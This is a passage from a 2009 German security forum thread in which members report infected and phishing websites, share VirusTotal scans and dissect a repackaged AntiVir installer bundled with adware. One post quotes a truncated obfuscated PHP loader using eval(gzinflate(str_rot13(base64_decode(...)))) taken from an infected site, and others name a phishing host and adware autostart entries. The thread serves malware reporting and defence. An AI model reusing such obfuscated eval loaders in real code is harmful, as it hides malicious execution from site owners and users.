 Infizierte Webseiten |
Willkommen, Gast ( Anmelden | Registrierung )
  |
 28.10.2009, 20:26
Beitrag
#921
|
|
|
Wohnt schon fast hier  Gruppe: Mitglieder Beiträge: 1.173 Mitglied seit: 11.06.2007 Wohnort: Whitelist Mitglieds-Nr.: 6.272  |
Jup:
http://www.virustotal.com/de/analisis/0aae...5632-1256758120 Der Beitrag wurde von rolarocka bearbeitet: 28.10.2009, 20:32 |
 |
 
|
|
28.10.2009, 23:05
Beitrag
#922
|
|
|
Gehört zum Inventar Gruppe: Mitglieder Beiträge: 2.051 Mitglied seit: 15.10.2006 Mitglieds-Nr.: 5.448 Betriebssystem: Win7 Prof. x64 Virenscanner: GDATA TP 20xx Firewall: GDATA TP 20xx |
G Data löscht es auch beim Ausführen über die Verhaltensanalyse.
|
|
|
|
|
30.10.2009, 23:07
Beitrag
#923
|
|
|
Threadersteller Ist unverzichtbar Gruppe: Mitglieder Beiträge: 4.246 Mitglied seit: 12.06.2004 Mitglieds-Nr.: 984 Betriebssystem: Windows 10 |
Ups, und schon war es geschehen. Hatte einen Bericht über Security gelesen, und wollte mir mal den Namen des Herrn bei Google suchen. Vermeintlichen Namen gefunden und geklickt, ( WOT zeigte ein sattes grün ) und dann das. Seite mit Norton Safe Web, und mit Mc Afee Site Advisor überprüft, da allerdings nicht bekannt.
 hier dann noch den genommen, scheint sich zu bestätigen.  Das ist der Link. 
|
|
|
|
|
30.10.2009, 23:24
Beitrag
#924
|
|
 Ist unverzichtbar Gruppe: Mitglieder Beiträge: 14.840 Mitglied seit: 05.07.2004 Mitglieds-Nr.: 1.143 Betriebssystem: Windows 7 SP1 (x64) Virenscanner: NIS2013 Firewall: NIS2013 |
-------------------- Der Beitrag wurde von Unbekannt bearbeitet: Morgen, 06:00
System: Intel C2Q9550 , Gigabyte GA-P35-DS3L , 8GB Mushkin , XFX HD6670 , Samsung SATA2 (750GB, 500GB, 2x 1TB) , ATAPI & NEC DVDRAM , TFT Samsung T260 26" , Case Lian Li PC-7FNW , Corsair Accelerator SSD 60GB "Irgendwelche Politiker mögen irgendwann mal einen cleveren Gedanken haben, aber in der Regel plappern sie nur die Agenda der Lobbyisten nach." Lobbyismus für Dummies : http://www.youtube.com/watch?v=P_QVyOGnIrI Einschätzung zur Wikileaks Lage : http://www.youtube.com/watch?v=HVJAUECLdo8 , http://www.youtube.com/watch?v=gWR4VAyva6s |
|
|
|
|
31.10.2009, 00:48
Beitrag
#925
|
|
 Ist unverzichtbar Gruppe: Mitglieder Beiträge: 11.168 Mitglied seit: 28.11.2004 Mitglieds-Nr.: 1.621 Betriebssystem: Windows 10 pro x64 Virenscanner: Emsisoft Anti-Malware Firewall: Sandboxie | cFos |
Wenn die Site gespeichert wird, zeigt VT folgendes Ergebnis:
http://www.virustotal.com/de/analisis/aec6...c2e1-1256946321 -------------------- Yours sincerely
Uwe Kraatz |
|
|
|
|
01.11.2009, 10:04
Beitrag
#926
|
|
|
Threadersteller Ist unverzichtbar Gruppe: Mitglieder Beiträge: 4.246 Mitglied seit: 12.06.2004 Mitglieds-Nr.: 984 Betriebssystem: Windows 10 |
|
|
|
|
|
01.11.2009, 11:16
Beitrag
#927
|
|
|
Ist unverzichtbar Gruppe: Mitglieder Beiträge: 11.168 Mitglied seit: 28.11.2004 Mitglieds-Nr.: 1.621 Betriebssystem: Windows 10 pro x64 Virenscanner: Emsisoft Anti-Malware Firewall: Sandboxie | cFos |
Unter Opera wird nur Code-Zeugs angezeigt. Textdatei eben.
QUELLTEXT <?php
$vopcrew = "pZLNd8MwEITvgbyDIgyWIZT059Q0xdBYYg30TR_und noch was hinterher_ eval(gzinflate(str_rot13(base64_decode($vopcrew)))); exit; -------------------- Yours sincerely
Uwe Kraatz |
|
|
|
|
01.11.2009, 11:20
Beitrag
#928
|
|
|
Ist unverzichtbar Gruppe: Mitglieder Beiträge: 14.840 Mitglied seit: 05.07.2004 Mitglieds-Nr.: 1.143 Betriebssystem: Windows 7 SP1 (x64) Virenscanner: NIS2013 Firewall: NIS2013 |
Das wird auch im IE und FF so dargestellt , wer weiss was Kaspersky daran findet. Die Russen werden wohl extra wegen dem ZeichenString eine Sig angefertigt haben.
-------------------- Der Beitrag wurde von Unbekannt bearbeitet: Morgen, 06:00
System: Intel C2Q9550 , Gigabyte GA-P35-DS3L , 8GB Mushkin , XFX HD6670 , Samsung SATA2 (750GB, 500GB, 2x 1TB) , ATAPI & NEC DVDRAM , TFT Samsung T260 26" , Case Lian Li PC-7FNW , Corsair Accelerator SSD 60GB "Irgendwelche Politiker mögen irgendwann mal einen cleveren Gedanken haben, aber in der Regel plappern sie nur die Agenda der Lobbyisten nach." Lobbyismus für Dummies : http://www.youtube.com/watch?v=P_QVyOGnIrI Einschätzung zur Wikileaks Lage : http://www.youtube.com/watch?v=HVJAUECLdo8 , http://www.youtube.com/watch?v=gWR4VAyva6s |
|
|
|
|
01.11.2009, 11:26
Beitrag
#929
|
|
|
Ist unverzichtbar Gruppe: Mitglieder Beiträge: 11.168 Mitglied seit: 28.11.2004 Mitglieds-Nr.: 1.621 Betriebssystem: Windows 10 pro x64 Virenscanner: Emsisoft Anti-Malware Firewall: Sandboxie | cFos |
Kaspersky, Avire, Ikarus, Sunbelt, Comodo, VBA32... Sind schon ein paar mehr. Aber da sieht man den Automatismus beim Erstellen solcher Sigs
-------------------- Yours sincerely
Uwe Kraatz |
|
|
|
|
03.11.2009, 21:06
Beitrag
#930
|
|
|
Threadersteller Ist unverzichtbar Gruppe: Mitglieder Beiträge: 4.246 Mitglied seit: 12.06.2004 Mitglieds-Nr.: 984 Betriebssystem: Windows 10 |
Scheint ne Phishing Seite zu sein. Firefox blockert sie, mit dem IE sieht es so aus. Nur die Trend Warnung scheint hier zu greifen.
 h??p:/./pd907f38a.dip0.t-ipconnect.de |
|
|
|
|
03.11.2009, 21:54
Beitrag
#931
|
|
|
Ist unverzichtbar Gruppe: Mitglieder Beiträge: 14.840 Mitglied seit: 05.07.2004 Mitglieds-Nr.: 1.143 Betriebssystem: Windows 7 SP1 (x64) Virenscanner: NIS2013 Firewall: NIS2013 |
Es ist Phishing , Norton erkennt sie.
http://safeweb.norton.com/report/show?url=...ipconnect.de%2F Der Beitrag wurde von Voyager bearbeitet: 03.11.2009, 21:54 -------------------- Der Beitrag wurde von Unbekannt bearbeitet: Morgen, 06:00
System: Intel C2Q9550 , Gigabyte GA-P35-DS3L , 8GB Mushkin , XFX HD6670 , Samsung SATA2 (750GB, 500GB, 2x 1TB) , ATAPI & NEC DVDRAM , TFT Samsung T260 26" , Case Lian Li PC-7FNW , Corsair Accelerator SSD 60GB "Irgendwelche Politiker mögen irgendwann mal einen cleveren Gedanken haben, aber in der Regel plappern sie nur die Agenda der Lobbyisten nach." Lobbyismus für Dummies : http://www.youtube.com/watch?v=P_QVyOGnIrI Einschätzung zur Wikileaks Lage : http://www.youtube.com/watch?v=HVJAUECLdo8 , http://www.youtube.com/watch?v=gWR4VAyva6s |
|
|
|
|
03.11.2009, 22:56
Beitrag
#932
|
|
|
Threadersteller Ist unverzichtbar Gruppe: Mitglieder Beiträge: 4.246 Mitglied seit: 12.06.2004 Mitglieds-Nr.: 984 Betriebssystem: Windows 10 |
Hm, ein Hundesportverein wieder eine Text Sache?
 mit im Boot: a-squared, PC Tools, Virusbuster und Ikarus. Vorsicht!! |
|
|
|
|
04.11.2009, 16:45
Beitrag
#933
|
|
|
Threadersteller Ist unverzichtbar Gruppe: Mitglieder Beiträge: 4.246 Mitglied seit: 12.06.2004 Mitglieds-Nr.: 984 Betriebssystem: Windows 10 |
Hier ist es zwar nicht die Seite direkt, aber evtl. das was hier angeboten wird.
1.  2.  3.  4.  5. Der Link 
|
|
|
|
|
04.11.2009, 16:57
Beitrag
#934
|
|
|
Ist unverzichtbar Gruppe: Mitglieder Beiträge: 14.840 Mitglied seit: 05.07.2004 Mitglieds-Nr.: 1.143 Betriebssystem: Windows 7 SP1 (x64) Virenscanner: NIS2013 Firewall: NIS2013 |
das ist das originale antivir gespickt mit beigefügten zusatzinstallationen in einem zip sfx.
Beigaben : http://www.virustotal.com/de/analisis/90ca...0040-1257349880 und http://www.virustotal.com/de/analisis/8258...f1c9-1257350048 Ich habs mal in der VM angetestet : O4 - HKCU\..\Run: [weather9-service] C:\Dokumente und Einstellungen\Jens\Anwendungsdaten\weather9\weather9-service.exe O4 - HKCU\..\Run: [Direct Card Updater] C:\Dokumente und Einstellungen\Jens\Anwendungsdaten\DirectCard Updater\Direct Card Updater.exe das sieht mir auf dem ersten Blick nach Spyware aus. Im IE sind neue Buttons zu Ebay und Amazon die über diese Redirect URL gehen http://www.mywot.com/de/scorecard/merlin1.eu , und im WOT natürlich mit schlechten Ruf 
Der Beitrag wurde von Voyager bearbeitet: 04.11.2009, 17:15 -------------------- Der Beitrag wurde von Unbekannt bearbeitet: Morgen, 06:00
System: Intel C2Q9550 , Gigabyte GA-P35-DS3L , 8GB Mushkin , XFX HD6670 , Samsung SATA2 (750GB, 500GB, 2x 1TB) , ATAPI & NEC DVDRAM , TFT Samsung T260 26" , Case Lian Li PC-7FNW , Corsair Accelerator SSD 60GB "Irgendwelche Politiker mögen irgendwann mal einen cleveren Gedanken haben, aber in der Regel plappern sie nur die Agenda der Lobbyisten nach." Lobbyismus für Dummies : http://www.youtube.com/watch?v=P_QVyOGnIrI Einschätzung zur Wikileaks Lage : http://www.youtube.com/watch?v=HVJAUECLdo8 , http://www.youtube.com/watch?v=gWR4VAyva6s |
|
|
|
|
04.11.2009, 17:19
Beitrag
#935
|
|
|
Wohnt schon fast hier Gruppe: Mitglieder Beiträge: 1.173 Mitglied seit: 11.06.2007 Wohnort: Whitelist Mitglieds-Nr.: 6.272 |
Also das:
 ergibt diesen kram (Sandboxie):  HitmanPro meldet 0:  Eset auch (auch Prevx): 
Der Beitrag wurde von rolarocka bearbeitet: 04.11.2009, 17:44 |
|
|
|
|
04.11.2009, 17:43
Beitrag
#936
|
|
|
Threadersteller Ist unverzichtbar Gruppe: Mitglieder Beiträge: 4.246 Mitglied seit: 12.06.2004 Mitglieds-Nr.: 984 Betriebssystem: Windows 10 |
Könnte aber auch in den Bereich Abzocke fallen. Hab da mal etwas zu lesen gefunden. Einige dieser Tools sind auch in rolarocka's Bildern zu sehen.
http://www.abzocknews.de/2009/07/01/kampag...wnload-abzocker |
|
|
|
|
04.11.2009, 17:49
Beitrag
#937
|
|
|
Wohnt schon fast hier Gruppe: Mitglieder Beiträge: 1.173 Mitglied seit: 11.06.2007 Wohnort: Whitelist Mitglieds-Nr.: 6.272 |
Hab diese Direct_Card_Updater.exe mal an Avira geschickt. Mal gucken was kommt.
http://www.virustotal.com/analisis/90ca713...0040-1257353121 |
|
|
|
|
04.11.2009, 17:57
Beitrag
#938
|
|
|
Ist unverzichtbar Gruppe: Mitglieder Beiträge: 14.840 Mitglied seit: 05.07.2004 Mitglieds-Nr.: 1.143 Betriebssystem: Windows 7 SP1 (x64) Virenscanner: NIS2013 Firewall: NIS2013 |
Blendung und Täuschung ist das auf jeden Fall , auf der Webseite steht : Keine Spyware oder Adware enthalten
und in dem Lizenztext steht dann : - es können Werbebanner und Pop-Ups auf dem Bildschirm erscheinen - eigene Werbung oder Werbung Dritter kann vermittelt werden - Einstellungen des Internet Explorers und des Mozilla Firefox-Browsers können verändert werden - URLs können umgeleitet werden - Suchanfragen des Nutzers können analysiert und mit Werbung versehen werden - Updatedienste können ausgeführt werden - ShellLinks können verändert und/oder ersetzt werden. Na kuck einer schau , adware und spyware... Der Beitrag wurde von Voyager bearbeitet: 04.11.2009, 17:59 -------------------- Der Beitrag wurde von Unbekannt bearbeitet: Morgen, 06:00
System: Intel C2Q9550 , Gigabyte GA-P35-DS3L , 8GB Mushkin , XFX HD6670 , Samsung SATA2 (750GB, 500GB, 2x 1TB) , ATAPI & NEC DVDRAM , TFT Samsung T260 26" , Case Lian Li PC-7FNW , Corsair Accelerator SSD 60GB "Irgendwelche Politiker mögen irgendwann mal einen cleveren Gedanken haben, aber in der Regel plappern sie nur die Agenda der Lobbyisten nach." Lobbyismus für Dummies : http://www.youtube.com/watch?v=P_QVyOGnIrI Einschätzung zur Wikileaks Lage : http://www.youtube.com/watch?v=HVJAUECLdo8 , http://www.youtube.com/watch?v=gWR4VAyva6s |
|
|
|
|
04.11.2009, 18:14
Beitrag
#939
|
|
|
Wohnt schon fast hier Gruppe: Mitglieder Beiträge: 1.300 Mitglied seit: 11.02.2009 Mitglieds-Nr.: 7.357 |
hab die gesammte Seite an avira gemeldet
|
|
|
|
|
04.11.2009, 21:55
Beitrag
#940
|
|
 Wohnt schon fast hier Gruppe: Mitglieder Beiträge: 936 Mitglied seit: 01.07.2008 Mitglieds-Nr.: 6.934 Betriebssystem: Windows 10 Pro Virenscanner: ESET |
ZITAT(Rios @ 04.11.2009, 17:42)  Könnte aber auch in den Bereich Abzocke fallen. Hab da mal etwas zu lesen gefunden. Einige dieser Tools sind auch in rolarocka's Bildern zu sehen. http://www.abzocknews.de/2009/07/01/kampag...wnload-abzocker Interessanter Link Rios 
-------------------- Gruß feni
------------------------------------------------------------------------------------------- secure-one.de |
|
|
|
|
3 Besucher lesen dieses Thema (Gäste: 3 | Anonyme Besucher: 0)
0 Mitglieder:
| Vereinfachte Darstellung | Aktuelles Datum: 07.06.2025, 17:35 |
Original Style by Bo Derek, further improvements and board management by Style Biz | Webdevelopment